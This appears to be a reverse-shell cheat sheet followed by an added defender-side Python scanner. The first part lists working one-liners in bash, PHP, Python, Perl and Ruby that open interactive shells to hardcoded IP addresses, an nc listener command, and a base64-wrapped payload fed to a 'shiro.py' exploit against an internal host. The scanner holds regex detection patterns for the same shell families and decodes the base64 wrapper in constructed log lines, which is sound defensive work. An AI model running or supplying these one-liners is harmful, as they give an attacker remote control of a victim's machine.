bash -i >& /dev/tcp/10.0.10.124/23008 0>&1
php -r '$sock=fsockopen("150.158.104.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.158.104.227",9997));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"150.158.104.227:9996");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("150.158.104.227","9996");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
exec 5<>/dev/tcp/150.158.104.227/9996
php -r 'exec("/bin/bash -i >& /dev/tcp/150.158.104.227/9994");'
On the other side, use nc to listen on the port: `nc -lvvp 23008`
To build a reverse shell payload, it is sometimes necessary to base64-encode it first and then run the exploit, for example:
python2 shiro.py http://10.0.10.179:8080/ "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEyNC8yMzAxMCAwPiYx}|{base64,-d}|{bash,-i}"
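As an added defender-side example (not from the original page or the shiro.py tool): a small Python scanner that flags process command lines matching the reverse shell families listed above and decodes the `{echo,<base64>}|{base64,-d}` wrapper so the hidden `/dev/tcp` command is inspected as well. The log lines are constructed; the base64 string is the one from the page.

```python
import base64
import re

# Substrings typical of the reverse shell one-liners listed on the page.
INDICATORS = {
    "bash_dev_tcp": r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+",
    "php_fsockopen": r"fsockopen\(",
    "python_dup2": r"os\.dup2\(",
    "perl_socket": r"IO::Socket::INET",
    "ruby_tcpsocket": r"TCPSocket\.new",
    "b64_wrapper": r"\{echo,[A-Za-z0-9+/=]+\}\|\{base64,-d\}",
}
B64_TOKEN = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}")

def decode_wrapped(cmdline):
    """Return the command hidden in an {echo,<b64>} wrapper, or None."""
    m = B64_TOKEN.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error (bad alphabet/padding) is a ValueError
        return None

def scan_cmdline(cmdline):
    """Sorted indicator names hit by the command line or its decoded payload."""
    hits = {n for n, p in INDICATORS.items() if re.search(p, cmdline)}
    inner = decode_wrapped(cmdline)
    if inner:
        hits |= {n for n, p in INDICATORS.items() if re.search(p, inner)}
    return sorted(hits)

# Constructed process-creation log lines: "<pid> <user> <command line>".
SAMPLE_LOG = [
    "1201 www-data bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEyNC8yMzAxMCAwPiYx}|{base64,-d}|{bash,-i}",
    "1202 www-data php -r 'fsockopen(\"192.0.2.10\",4444);'",
    "1203 alice python3 -c 'print(1)'",
    "1204 root /usr/sbin/sshd -D",
]

def scan_log(lines):
    """Return (pid, user, hits) for every line with at least one indicator."""
    findings = []
    for line in lines:
        pid, user, cmd = line.split(" ", 2)
        hits = scan_cmdline(cmd)
        if hits:
            findings.append((pid, user, hits))
    return findings
```

The plain outer command line of the base64-wrapped sample contains no `/dev/tcp`, so only decoding the wrapper surfaces that indicator.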